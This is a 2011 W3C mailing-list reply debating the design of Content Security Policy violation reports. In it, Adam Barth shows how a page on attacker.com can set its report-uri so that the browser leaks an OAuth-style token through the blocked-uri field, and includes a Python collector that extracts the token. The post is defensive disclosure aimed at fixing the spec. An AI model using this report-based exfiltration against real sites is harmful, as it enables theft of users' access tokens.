
Re: Violation reports

From: Adam Barth <w3c@adambarth.com>
Date: Thu, 21 Apr 2011 11:15:26 -0700
Message-ID: <BANLkTincOW2DFbGiCvjmRsXBa1qh5CCAxQ@mail.gmail.com>
To: Brandon Sterne <bsterne@mozilla.com>
Cc: public-web-security@w3.org
On Thu, Apr 21, 2011 at 10:32 AM, Brandon Sterne <bsterne@mozilla.com> wrote:
> I think many of your points below are valid, but I want to push back on
> a few things.
>
> (and apologies if I make less sense than normal... I'm under the
> influence of cold medicine)
>
> On 4/20/11 1:06 PM, Adam Barth wrote:
>> It seems like there's a trade-off in the violation reports between how
>> much information is contained in the report and which URIs are
>> acceptable values for report-uri.
>>
>> == Issues ==
>>
>> Currently, the spec says to restrict the report-uri to "public suffix
>> +1 DNS label."  Philosophically, I don't think we should be adding
>> more things to the web platform that depend on the public suffix list.
>>  That list is basically a hack we need to make cookies not be a
>> complete security disaster.  Having more things use that list is
>> bad for the web.
>
> We could also restrict the report-uri to the same origin (or host) as
> the protected document.  This was how the directive was originally
> proposed.  Public suffix +1 was added as a response to folks who wanted
> to consolidate reports from multiple subdomains under one collector.

I agree that there's a use case for reporting to a different origin,
which is what got me thinking about paring down the report to
something that's safe to send anywhere.

>> Coming from the other direction, the violation reports currently contain
>> too much information.  For example, a malicious web site can use the
>> blocked-uri field to learn where cross-origin redirects lead.  That's
>> exploitable in a number of scenarios, which I can explain in more
>> detail if you're unfamiliar with these attacks.
>
> Yes, the attacker can learn about where cross-origin redirects lead, but
> only if they get access to the report.  This is part of the motivation
> behind locking down the report-uri.

Locking down the report-uri doesn't really help.  Here's a specific
attack scenario.  Let's consider a fictional, simplified version of
OAuth called XAuth.  (I haven't checked whether the real OAuth
protocol actually interacts badly with these reports.)

1) Suppose https://mail.example.com/issueToken?to=X is an XAuth
endpoint that checks whether URL X is authorized to receive an XAuth
token for the current user (e.g., as identified by a cookie).  If so,
mail.example.com redirects back to X with the token appended as a
query parameter.

2) Suppose https://awesome-contacts.com/ is authorized to access
Alice's mail.example.com contact list.

3) Alice visits https://attacker.com.

In this scenario, I'll show that the attacker can obtain the XAuth
token for Alice's mail.example.com contact list.

1) When Alice visits https://attacker.com/, the attacker's server
responds with the following CSP policy:

X-Content-Security-Policy: img-src https://mail.example.com;
report-uri https://attacker.com/report.cgi

and the following HTML:

<img src="https://mail.example.com/issueToken?to=https://awesome-contacts.com/">

2) The CSP policy allows the request to https://mail.example.com.

3) mail.example.com checks the cookie to ensure that this request is
coming from Alice's browser and checks the value of the "to" parameter
to ensure that the URL is authorized to receive the token.  Both these
checks pass, and the server responds with a redirect to
https://awesome-contacts.com/?XAuthToken=3987nocvn0q23n9ancv.

4) The CSP policy does not allow the request to https://awesome-contacts.com.

5) Alice's browser generates a violation report containing the URL
https://awesome-contacts.com/?XAuthToken=3987nocvn0q23n9ancv and sends
that report to the report-uri, which is
https://attacker.com/report.cgi.

6) The attacker has learned the XAuth token for Alice's
mail.example.com contact list.
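To make the leak concrete, here's a minimal sketch of what the collector at https://attacker.com/report.cgi could do with the incoming report.  The "csp-report" / "blocked-uri" field names follow the draft's JSON report format, and XAuthToken is from the fictional protocol above:

```python
# Hypothetical report collector logic for https://attacker.com/report.cgi.
# Field names (csp-report, blocked-uri) follow the draft JSON report
# format; XAuthToken belongs to the fictional XAuth protocol above.
import json
from urllib.parse import urlsplit, parse_qs


def extract_token(report_body):
    """Pull the leaked XAuth token out of a CSP violation report."""
    report = json.loads(report_body).get("csp-report", {})
    # blocked-uri is the post-redirect URL, e.g.
    # https://awesome-contacts.com/?XAuthToken=3987nocvn0q23n9ancv
    blocked = report.get("blocked-uri", "")
    query = parse_qs(urlsplit(blocked).query)
    tokens = query.get("XAuthToken")
    return tokens[0] if tokens else None


body = (b'{"csp-report": {"blocked-uri": '
        b'"https://awesome-contacts.com/?XAuthToken=3987nocvn0q23n9ancv"}}')
print(extract_token(body))  # 3987nocvn0q23n9ancv
```

Note that the attacker never needs to read the cross-origin response; the browser hands over the post-redirect URL in the report.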

>> As another example, the SecurityViolation DOM event will contain the
>> raw Cookie header field in the request-headers field.  If the Cookie
>> header contains HttpOnly cookies, that will violate the security
>> requirements of HttpOnly cookies.
>
> Yes, this is true and I would propose to make a change to the spec that
> removes HttpOnly cookies from the request-headers field of the
> SecurityViolation event details.
>
>> == Proposal ==
>>
>> I recommend we simplify violation reports to the point where we can send
>> them to any URI.  Specifically, we should include:
>>
>> 1) The document's URI.
>> 2) The directive that was violated.
>>
>> Notice that a bunch of other useful information (such as the
>> User-Agent and cookies) will be included in the request automagically.
>
> I definitely see the value of wanting a report format that carries no
> risk of exposure, but I think this removes a great deal of the value of
> the reports to the sites implementing CSP.
>
> Twitter's recent experience [1] in implementing CSP is a great example
> of what I'm talking about.  They learned through violation reports that
> downstream ISPs were inserting JavaScript and modifying images in the
> Twitter responses.  The blocked-uri field of the report was how they
> discovered this information.  Without that information in the report, it
> is unlikely that the developers alone could have tracked down the source
> of those violations, since they would likely receive a different-looking
> response when they fetched those pages.
>
> There is another way in which sending more information in the reports is
> better: the ability to generate "signatures" for common violation
> reports.  There may be non-malicious violations that commonly occur on
> your site (think GreaseMonkey) and you might want to whitelist those
> particular violations.  If Document URI and violated-directive are the
> only fields in the report, it is very unlikely you could create
> meaningful signatures.

Maybe we should provide the hash of the blocked-uri?  Providing the
URL itself is dangerous, but you could still use the hash to create a
signature of known violations.  Of course, it would be harder to
figure out what was going wrong in the first place.
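A sketch of that idea, assuming the report carried a hashed-uri digest in place of blocked-uri (the hashed-uri field name is my invention, not from the spec):

```python
# Sketch of hash-based violation signatures.  The hashed-uri field is
# hypothetical: the browser would send a digest of the blocked URI
# rather than the URI itself, and the site whitelists digests of
# known-benign violations (e.g. the GreaseMonkey case above).
import hashlib


def uri_hash(uri):
    return hashlib.sha256(uri.encode("utf-8")).hexdigest()


# Digests of violations the site has decided to ignore.
KNOWN_BENIGN = {uri_hash("https://userscripts.example/gm.js")}


def is_known_violation(report):
    # The raw URI never appears in the report, only its digest.
    return report.get("hashed-uri") in KNOWN_BENIGN


report = {
    "document-uri": "https://example.com/",
    "hashed-uri": uri_hash("https://userscripts.example/gm.js"),
}
print(is_known_violation(report))  # True
```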

> I do think removing the request-headers field from the report sounds
> reasonable, as the bulk of that information could be transmitted in the
> report request "envelope".
>
>> As a side note, instead of using JSON, we should just use regular
>> application/x-www-form-urlencoded data.  JSON is very fashionable at
>> the moment, but every server framework already knows how to deal with
>> application/x-www-form-urlencoded data because that's what the <form>
>> element generates.
>
> I'm not crazy about this change, actually.  One of the things that is
> nice about JSON is that the same JSON object sent in the report POST
> body can be passed directly to the SecurityViolation event constructor
> as the detail argument.
>
> How would you construct the SecurityViolation event if you were using
> application/x-www-form-urlencoded as the report format?

IMHO, we should just get rid of the SecurityViolation event.  I was
hoping that we could use that instead of the report-uri, but you and
others have convinced me that sending an HTTP request with the report
is worthwhile.
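For comparison, a report pared down to the two fields proposed above fits naturally into application/x-www-form-urlencoded, which every <form>-handling stack can already parse (field names here are illustrative, not from the draft):

```python
# Illustrative round-trip of a two-field violation report encoded as
# application/x-www-form-urlencoded.  Field names are assumptions.
from urllib.parse import urlencode, parse_qs

report = {
    "document-uri": "https://example.com/page",
    "violated-directive": "img-src https://mail.example.com",
}

# What the browser would POST as the request body.
body = urlencode(report)

# Any server framework that handles <form> submissions can decode it.
decoded = {k: v[0] for k, v in parse_qs(body).items()}
print(decoded == report)  # True
```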

Adam
Received on Thursday, 21 April 2011 18:16:27 GMT
